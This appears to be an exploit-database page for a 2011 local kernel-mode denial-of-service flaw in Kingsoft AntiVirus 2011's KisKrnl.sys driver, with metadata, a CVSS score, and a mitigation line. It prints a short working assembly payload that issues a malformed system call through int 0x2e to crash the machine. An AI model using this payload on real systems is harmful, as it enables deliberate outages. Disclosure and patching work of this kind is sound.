header-logo
Suggest Exploit
vendor:
Kingsoft AntiVirus 2011
by:
MJ0011
7.2
CVSS
HIGH
Local Kernel Mode Denial of Service (DoS)
399
CWE
Product Name: Kingsoft AntiVirus 2011
Affected Version From: KingSoft AntiVirus 2011 SP5.2
Affected Version To: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
Patch Exists: YES
Related CWE: N/A
CPE: a:kingsoft:kingsoft_antivirus:2011
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit

KisKrnl.sys hook the kernel function KiFastCallEntry, but is not correctly handle user stack pointer. The exploit code is written in assembly language and it moves 0x80000000 to edx and 0x101 to eax and then calls int 0x2e.

Mitigation:

Apply the latest security patches and updates from the vendor.
Source

Exploit-DB raw data:

# Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit
# Date: 2011-1-16
# Author: MJ0011
# Software Link: http://cd001.www.duba.net/duba/install/2011/once/KAV110114_DOWN_9_13.exe
# Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
# Tested on: Windows XP SP3

DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle user stack pointer

EXPLOIT CODE:

__asm
{
mov edx , 0x80000000
mov eax , 0x101        ;id of NtTerminateProcess under Windows XP 
int 0x2e
}

Navigation

Suggest Exploit

Services By CQR